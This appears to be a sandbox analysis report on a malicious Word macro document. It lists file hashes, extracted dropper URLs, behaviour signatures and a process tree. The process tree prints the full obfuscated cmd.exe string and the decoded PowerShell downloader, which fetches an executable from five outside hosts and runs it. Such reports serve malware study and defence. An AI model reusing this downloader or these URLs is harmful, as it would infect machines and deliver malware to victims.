Overview

overview

10

Static

static

8

ffd7ed2ea2...18.doc

windows7-x64

10

ffd7ed2ea2...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    30-09-2024 03:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ffd7ed2ea278afe39daf3b7f6d4819d3_JaffaCakes118.doc

  • Size

    126KB

  • MD5

    ffd7ed2ea278afe39daf3b7f6d4819d3

  • SHA1

    e7245488c6048d3a4bb0c7a49cacc1f2145330fb

  • SHA256

    04ae3026fc9502f115794757e29bef4a6ad6cf3047fb7b444b0ddbed9504c631

  • SHA512

    59ea97a02a17c1fe21b30dae6ebe206798943f9a8b245686420e33ac2da46f647000a67e2208eb2f63e4f7a32a7c0c76de65312dd7f9895fc74776e31468c726

  • SSDEEP

    3072:A8GhDS0o9zTGOZD6EbzCd3WiWCAWcWvfxa:eoUOZDlbe3WiWCAWcWvfxa

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://levifca.com/y0tYhnWQ
exe.dropper

http://mfpvision.com/yAkPNiSmm6
exe.dropper

http://haganelectronics.rubickdesigns.com/C96xSAAy2q
exe.dropper

http://catairdrones.com/sMQ0n8nNun
exe.dropper

http://radio312.com/mp0NHN4cHX

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ffd7ed2ea278afe39daf3b7f6d4819d3_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2480
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2720
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /V:O/C"set lj=;'afd'=dww$}}{hctac}};kaerb;'boU'=OFK$;vWd$ metI-ekovnI{ )00008 eg- htgnel.)vWd$ metI-teG(( fI;'fBW'=fSP$;)vWd$ ,abU$(eliFdaolnwoD.dam${yrt{)tdB$ ni abU$(hcaerof;'exe.'+Ihv$+'\'+pmet:vne$=vWd$;'BLv'=zqo$;'391' = Ihv$;'UDL'=DqS$;)'@'(tilpS.'XHc4NHN0pm/moc.213oidar//:ptth@nuNn8n0QMs/moc.senordriatac//:ptth@q2yAASx69C/moc.sngisedkcibur.scinortcelenagah//:ptth@6mmSiNPkAy/moc.noisivpfm//:ptth@QWnhYt0y/moc.acfivel//:ptth'=tdB$;tneilCbeW.teN tcejbo-wen=dam$;'kaF'=zYv$ llehsrewop&&for /L %9 in (475;-1;0)do set Yfw=!Yfw!!lj:~%9,1!&&if %9==0 powershell "!Yfw:*Yfw!=!" "
        2⤵
        • Process spawned unexpected child process
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2696
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "powershell $vYz='Fak';$mad=new-object Net.WebClient;$Bdt='http://levifca.com/y0tYhnWQ@http://mfpvision.com/yAkPNiSmm6@http://haganelectronics.rubickdesigns.com/C96xSAAy2q@http://catairdrones.com/sMQ0n8nNun@http://radio312.com/mp0NHN4cHX'.Split('@');$SqD='LDU';$vhI = '193';$oqz='vLB';$dWv=$env:temp+'\'+$vhI+'.exe';foreach($Uba in $Bdt){try{$mad.DownloadFile($Uba, $dWv);$PSf='WBf';If ((Get-Item $dWv).length -ge 80000) {Invoke-Item $dWv;$KFO='Uob';break;}}catch{}}$wwd='dfa';"
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3020
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =Fak
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2148

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize

      7KB

      MD5

      c40cfb7a24846558608d43ffc8eb2324

      SHA1

      0f3fe8cb7be0959512cc4a789cda6b04c8938998

      SHA256

      14f039f377c70d6d8afda3868c7279238d0adec38e9712692f41a658c8ff7c32

      SHA512

      98ef01424ffe26318ded9503faf68f3f4e8adc3db78e5e687eb314b770ee0d161a24b201d347c178bc085e360847ea35a31673d6078a6b18b708c52f6bd7648b

      Download Submit

    • memory/2480-0-0x000000002F431000-0x000000002F432000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2480-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2480-2-0x0000000073FBD000-0x0000000073FC8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2480-5-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2480-6-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2480-7-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2480-20-0x0000000073FBD000-0x0000000073FC8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2480-21-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/3020-16-0x0000000002AB0000-0x0000000002AEC000-memory.dmp

      Filesize

      240KB

      Download

    • memory/3020-18-0x00000000055C0000-0x0000000005618000-memory.dmp

      Filesize

      352KB

      Download